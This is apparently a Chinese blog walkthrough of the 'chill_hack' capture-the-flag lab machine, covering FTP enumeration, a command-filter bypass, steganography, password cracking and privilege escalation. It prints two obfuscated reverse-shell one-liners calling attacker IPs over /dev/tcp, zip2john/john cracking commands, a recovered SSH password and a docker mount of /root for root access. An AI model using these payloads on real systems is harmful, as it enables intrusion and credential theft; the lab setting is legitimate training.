chill_hack靶机攻略

chill_hack靶机攻略

扫描

image-20231030210321452

image-20231030210331814

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

ftp 10.4.7.155
ftp
ftp
dir
get note.txt

image-20231030210308826

查看内容

image-20231030210456604

此处可以知道两个用户名,并且提示命令被过滤

bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

image-20231030214921904

image-20231030215018127

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

image-20231030215623251

靶机开启pythonweb服务

image-20231030215822449

使用工具

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john 

image-20231030220459149

pass1word

image-20231030220544113

查看一下解压出来的东西

发现密文

image-20231030220749247

IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

anurodh:!d0ntKn0wmYp@ssw0rd

image-20231030221114757

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

image-20231030222607471

发现就是在docker里

查看docker镜像

docker images

提权

docker run -it -v /root:/mnt alpine

image-20231030223032891

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值